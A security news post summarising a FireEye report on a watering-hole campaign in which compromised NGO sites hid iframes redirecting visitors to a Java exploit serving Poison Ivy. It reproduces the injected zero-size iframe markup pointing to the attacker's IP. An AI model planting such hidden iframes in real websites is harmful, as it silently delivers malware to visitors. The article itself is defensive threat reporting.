Categories: Cyber CrimeMalware

iFrame-based redirection attacks used to monitor Chinese organizations

Security Experts at FireEye discovered a new malicious campaign which is targeting Chinese organizations with iFrame traffic redirection to serve RAT.

Security experts at FireEye observed a new malicious campaign that is targeting non-profit organizations and non-governmental organizations by compromising legitimate website.

The threat actors use to compromise legitimate websites to host iframes used to hijack visitors to a threat actor-controlled IP address that serves a Poison Ivy remote access tool (RAT). Experts at FireEye discovered evidence of the involvement of the Sunshop Digital Quartermaster, a known collective of malware authors which provided malicious code used by different China-based APT groups.

FireEye previously identified this specific RT_MANIFEST as the ‘Sunshop Manifest,’ and we have observed this same manifest resource used in 86 other samples. As we stated in the Quartermaster report, we believe this shared resource is an artifact of a builder toolkit made available to a number of China-based APT groups.” states the report published by FireEye

The experts identified a similar attack pattern for the “hack” of at least three different websites: an international non-profit organization and two different non-governmental organizations.

The APT behind the attacks injected the malicious iframes on the targeted websites, in two cases it also obfuscated them.

<div class=”views-field views-field-body”>
<div class=”field-content”><p>
<iframe height=”0″ src=”http://103.27.108.45/img/js.php” width=”0″></iframe></p>

The iframes allow attacker to redirect visitors to a website hosting a Java exploits (103.27.108.45) which downloads and decodes a variant of Poison Ivy hosted at: hxxp:img//103.27.108.45//js.php.

It is interesting to note that to improve evasion capability of the RAT, the threat actor has also signed the code using the following digital certificate.

“Installation of certain types of software (e.g. application updates) its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, it reduces the possibility that a malware will be detected as quickly.” I wrote in a post on the misuses of digital certificates.

The attackers attempted to masquerade the malicious code as a Google Chrome file, but they misspelled multiple words.

The experts believe that the malicious campaign started compromising websites belonging to NGOs and non-profits to target other organizations in the same industries.

Technically the attackers are exploiting watering hole attacks to compromise organization employees and other organizations in the same industries, it is likely that Chinese hackers are working for the Government in surveillance activities.

“We suspects threat actors sought to monitor these programs and involved individuals. The three organizations whose websites are hosting the malicious iframes have China-based operations.” states the reports.”FireEye expects threat actors are motivated to steal programmatic data and monitor organizations’ programs in specific countries. If China-based threat actors are behind the observed campaign, FireEye expects that organizations with operations in China are high-priority targets.”

Anyway, not only those industries are affected by iFrame based attacks, the technique is very common in cyber criminal ecosystem and largely adopted also for financial motivated attacks.

Pierluigi Paganini

(Security Affairs – iframes, ATP)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

MITRE revealed that nation-state actors breached its systems via Ivanti zero-days

The MITRE Corporation revealed that a nation-state actor compromised its systems in January 2024 by…

8 hours ago

FBI chief says China is preparing to attack US critical infrastructure

China-linked threat actors are preparing cyber attacks against U.S. critical infrastructure warned FBI Director Christopher…

20 hours ago

United Nations Development Programme (UNDP) investigates data breach

The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack…

23 hours ago

FIN7 targeted a large U.S. carmaker with phishing attacks

BlackBerry reported that the financially motivated group FIN7 targeted the IT department of a large…

1 day ago

Law enforcement operation dismantled phishing-as-a-service platform LabHost

An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost.…

2 days ago

Previously unknown Kapeka backdoor linked to Russian Sandworm APT

Russia-linked APT Sandworm employed a previously undocumented backdoor called Kapeka in attacks against Eastern Europe since…

2 days ago

This website uses cookies.